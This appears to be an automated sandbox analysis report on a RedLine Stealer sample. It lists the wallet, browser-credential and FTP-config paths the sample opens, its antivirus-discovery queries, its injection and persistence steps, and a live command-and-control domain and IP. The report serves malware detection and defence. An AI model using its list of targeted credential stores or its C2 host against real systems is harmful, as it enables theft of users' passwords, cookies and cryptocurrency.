                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: RegSvcs.exe, 0000000D.00000002.1657406035.0000000006385000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 13P2mxLaQk.exe PID: 5880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4468, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3832, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 13P2mxLaQk.exe PID: 5880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4468, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3832, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 13P2mxLaQk.exe PID: 5880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4468, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3832, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		311
                    Process Injection                    		11
                    Masquerading                    		1
                    OS Credential Dumping                    		331
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		241
                    Virtualization/Sandbox Evasion                    		Security Account Manager241
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture22
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain Credentials113
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527904 Sample: 13P2mxLaQk.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 46 billred229102.duckdns.org 2->46 48 api.ip.sb 2->48 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 60 12 other signatures 2->60 8 13P2mxLaQk.exe 7 2->8         started        12 VWGccZGgix.exe 5 2->12         started        signatures3 58 Uses dynamic DNS services 46->58 process4 file5 38 C:\Users\user\AppData\...\VWGccZGgix.exe, PE32 8->38 dropped 40 C:\Users\...\VWGccZGgix.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp2CA3.tmp, XML 8->42 dropped 44 C:\Users\user\AppData\...\13P2mxLaQk.exe.log, ASCII 8->44 dropped 62 Found many strings related to Crypto-Wallets (likely being stolen) 8->62 64 Uses schtasks.exe or at.exe to add and modify task schedules 8->64 66 Writes to foreign memory regions 8->66 68 Adds a directory exclusion to Windows Defender 8->68 14 RegSvcs.exe 15 50 8->14         started        18 schtasks.exe 1 8->18         started        20 powershell.exe 23 8->20         started        70 Multi AV Scanner detection for dropped file 12->70 72 Allocates memory in foreign processes 12->72 74 Injects a PE file into a foreign processes 12->74 22 RegSvcs.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 50 billred229102.duckdns.org 45.88.88.45, 34221, 49707, 49710 LVLT-10753US Bulgaria 14->50 76 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->76 78 Found many strings related to Crypto-Wallets (likely being stolen) 14->78 80 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 14->80 26 conhost.exe 14->26         started        28 conhost.exe 18->28         started        82 Loading BitLocker PowerShell Module 20->82 30 conhost.exe 20->30         started        32 WmiPrvSE.exe 20->32         started        84 Tries to harvest and steal browser information (history, passwords, etc) 22->84 86 Tries to steal Crypto Currency Wallets 22->86 34 conhost.exe 22->34         started        36 conhost.exe 24->36         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    13P2mxLaQk.exe58%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    13P2mxLaQk.exe100%AviraHEUR/AGEN.1306285
                    13P2mxLaQk.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\VWGccZGgix.exe58%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    billred229102.duckdns.org
                    		45.88.88.45
                    		truetrue
                      		unknown
                      api.ip.sb
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://billred229102.duckdns.org:34221/true
                          		unknown
                          billred229102.duckdns.org:34221true
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://ipinfo.io/ip%appdata%13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                              		unknown
                              https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drfalse
                                		unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://tempuri.org/Endpoint/CheckConnectResponseRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://schemas.datacontract.org/2004/07/RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://tempuri.org/Endpoint/EnvironmentSettingsRegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.0000000003140000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://schemas.xmlsoap.org/soap/envelope/RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
